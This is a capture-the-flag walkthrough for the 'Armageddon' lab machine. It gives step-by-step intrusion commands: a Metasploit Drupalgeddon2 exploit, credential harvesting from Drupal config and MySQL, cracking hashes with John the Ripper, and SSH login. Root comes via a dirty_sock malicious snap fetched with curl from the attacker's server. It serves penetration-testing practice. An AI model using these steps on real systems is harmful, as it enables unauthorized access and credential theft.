In this post, i would like to share a walkthrough on Armageddon Machine.
This room has been considered difficulty rated as an Easy machine
Information Gathering on Armageddon
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Let’s open the browser and straight into the website interface.
Nothing that we can use on the website interface.
Gaining Access on Armageddon
There’s nothing malicious code implemented on the website. Let’s do some research on Drupal 7 which was mentioned in Nmap result. Most of the result leads to using Metasploit
Let’s run Metasploit on our attacker’s machine and search for any available exploit for Drupal 7 on Metasploit.
Let’s use exploit no 4 which is exploit/unix/webapp/drupa_drupalgeddon2
We need to know what kind of information to key-in on the exploit itself.
After a while, i notice that we only need to put in RHOSTS (Armageddon’s machine IP) and LHOST which our VPN IP
Once that have been completed, we need to exploit it by executing a command either run or exploit
We can open a shell and need to key-in the bash -i command to get a bash interface
We need to look at what has been stored here and i notice there’s a sites directory that looks suspicious
Let’s jump into the sites directory by typing cd sites
There’s a directory called default and let’s jump into that directory
Inside the default directory, there has a bunch of files that we investigate it.
It’s extremely hard to see everything on this file. Let’s use some wildcards to get the credentials that we needed.
After we use those wildcards, we found the username and password that can use later.
I notice on the source code that the system is using mysql service. Let’s use the credentials that we found in mysql service which the command can run such as mysql -u drupaluser -h localhost -p (password is the same that we found before.
We did find the username and password on the database, but the password is encrypted with hashes
Maintaining Access to Armageddon
Let’s crack the hashes using john the ripper with the command john <filename> -w=/usr/share/wordlists/rockyou.txt
During our nmap scanning, we notice that ssh service is open. Let’s ssh into the machine with the command ssh brucetherealadmin@<ip address> and we can use the password that we found using john over here.
We managed to login to the machine and i found the user flag.
Let’s grab the user flag by using cat user.txt
Escalate to Root Privileges Access
For us to have privileged access to root, we need to know any SUID that we can use if we notice the machine is vulnerable to snap exploit
Let’s do another research and found the dirty sock exploit can be used over here.
Exploiting a dirty sock on the machine
You need to download the dirty_sockv2.py into our machine
From the script, we just need to use Trojan_snap section with some extra commands from python and base64
As you can see above, we cannot execute it on the victim’s machine which we conclude only use on the attacker’s machine
For the exploit to be working well, we will execute on root privileges access
Next, the file will need to be transferred to the victim’s machine, so we need to start the python server
As usual, we need to transfer it using wget command but sadly that the victim’s machine doesn’t have that command installed
We can still use curl for that purpose and the command for that is curl http://<ip address>:<port>/<filename>.snap -o <any_name>.snap
We can verify that the file has been fully downloaded here.
Let’s install the dirty-sock 0.1 by running sudo /usr/bin/snap install –devmode <any_name>.snap
Once dirty sock has. installed, you can switch to dirty_sock privileges access by executing the command su dirty_sock
During my first time overrunning the command above, the machine gives an error saying that the user doesn’t exist. Those stuck here, can reset the machine, and re-try again the above command
We can clarify which privileges access we are using over here by running whoami command
To escalate to root privileges access, you need to execute sudo -i command with the password dirty-sock
Now, we logged in as the root users.
As usual, we need to access the /root/ directory and we need to type cat root.txt to grab the user flag
Happy Learning Guys!